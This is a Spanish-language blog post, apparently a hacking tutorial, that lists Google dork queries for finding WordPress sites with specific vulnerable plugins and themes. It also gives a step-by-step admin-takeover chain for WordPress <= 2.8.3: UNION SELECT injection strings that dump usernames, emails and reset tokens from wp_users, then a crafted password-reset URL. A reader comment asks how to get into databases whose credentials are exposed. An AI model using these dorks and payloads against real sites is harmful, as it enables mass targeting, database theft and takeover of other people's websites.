Hola a tod@s
Wordpress es sin duda el CMS más popular y usado por los
usuarios de la blogosfera, por ello también es el más atacado debido a los
miles de plugins y temas disponibles para WordPress.
Lo primero que se realiza es la parte de enumeración y como
encontrar sitios que utilicen Wordpress y los plugins que utilizan.
Encontrar sitios con Wordpress:
- intext:"Proudly powered by WordPress. "
- intext:"Powered by WordPress. "
Ver plugins instalados:
- inurl: /wordpress/wp-content/plugins/
Es hora de buscar algunas vulnerabilidades conocidas:
Listado de
directorio
- "index of" inurl:wp-content/
- "inurl:"/wp-content/plugins/wp-shopping-cart/"
Una de base de datos
- "inurl:wp-content/plugins/wp-dbmanager/"
Wordpress
theme Doraa XSS Vulnerability
- Themes by Bons.us
Wordpress theme
Dosimple XSS Vulnerability
- "Theme by domainagan.com."
WordPress
WP Symposium Plugin Cross Site Scripting
- "/wp-content/plugins/wp-symposium/"
WordPress mTheme-Unus
Local File Inclusion
- ilnurl:/wp-content/themes/mTheme-Unus/
Wordpress
Better-wp-security Plugin Remote Code Execution
- inurl:wp-content/plugins/better-wp-security
WordPress
U-Design Theme 2.7.9 Cross Site Scripting
- inurl:/wp-theme/u-design/
Wordpress
Plugin easy-comment-uploads File Upload Vulendrability
- inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php
WordPress
Category and Page Icons File Upload
- index of "/wp-content/plugins/category-page-icons/"
WordPress
theme parallelus-salutation Arbitrary File Download Vulnerability
- inurl:themes/parallelus-salutation/ OR inurl:themes/parallelus-salutation/framework/
WordPress
Auto-ThickBox-Plus XSS Vulnerability
inurl:"/wp-content/plugins/auto-thickbox-plus/"
Wordpress
"Js Support Ticket" File Upload Bypass Extensions
inurl:/js-support-ticket-controlpanel/
WordPress
Appointment Booking Calendar 1.1.24 Escalation / XSS
Index
of /wordpress/wp-content/plugins/appointment-booking-calendar/
WordPress
Appointment Booking Calendar 1.1.24 SQL Injection
- Index of /wordpress/wp-content/plugins/appointment-booking-calendar/
Wordpress
clikstats plugin Open Redirect
- Dork: inurl:"/wp-content/plugins/clikstats/ck.php?"
Arbitrary
File Upload: Easy Comment Uploads - Version - 3.2.1, usamos la siguiente dork:
- inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php
Stored XSS: Versión 3.2.3, usamos la siguiente dork:
- inurl:/wp-content/plugins/count-per-day/notes.php
Arbitrary
File Upload: Custom Content Type Manager, usamos la siguiente dork:
- inurl:/wp-content/plugins/custom-content-type-manager/upload_form.php
SQL Injection: Wordpress HD Webplayer - Versión 1.1, usamos
la siguiente dork:
- inurl:/wp-content/plugins/hd-webplayer/playlist.php?videoid=
[Full-disclosure]
WordPress <= 2.8.3 Remote admin reset password. Con este obtendremos
el user_login y user_email de la siguiente manera:
- /*!UNION*/+/*!SELECT*/group_concat(ID,0x3a,user_login,0x3a,user_email,0x3b),2,3,4,5,6,7,8,9,10,11 from wp_users
Una vez obtenido el usuario o e-mail nos dirigimos a
www.sitio-web.com/wp-admin y seleccionamos en ¿Olvidó su contraseña?
introducimos el usuario o e-mail.
Presionar en "Get New Password" la cual el sitio
web enviara un token, dicho token se almacena en la DB, por lo tanto se obtendrá
dicho código de la siguiente manera:
- /*!UNION*/+/*!SELECT*/group_concat(ID,0x3a,user_login,0x3a,user_activation_key,0x3b),2,3,4,5,6,7,8,9,10,11 from wp_users
Obtenido el token, sólo faltaría restablecer la contraseña,
para ello nos dirigimos al siguiente link:
http://www.sitio-web.com/wp-login.php?action=rp&key=Token&login=Usuario
Remplazamos el token
y usuario por lo datos que nos arroja la DB, por ejemplo:
http://www.sitio-web.com/wp-login.php?action=rp&key=JAr7W8letkza&login=admin
Por lo que lograremos la opción de restablecer la password
fácil, fácil y con fundamento.
Full Path Disclosure (FPD), usaremos la siguiente dork:
- inurl:"/wp-includes/
Wordpress
Formcraft Plugin File Upload Vulnerability
- intext:"powered by formcraft", inurl:plugins/formcraft
Wordpress
Smallbiz Themes Remote File Uploads Vulnerability
- inurl:wp-content/themes/smallbiz/palette/index.php
No seáis malos.
1 comentarios:
comentariosHola!
ReplyGracias por el post, estoy iniciandome un poco en el mundillo de las dork url, pero ahi algo que no logro hacer, me interesa acceder a algunas bases de datos, ya que veo sus contraseñas y usernames,..pero como accedo a esa base de datos?, intento desde phpmyadmin remoto pero no logro hacerlo, por cierto no es para hackear pero me interesa para saberlo para aplicar a mis propias paginas web, saludos!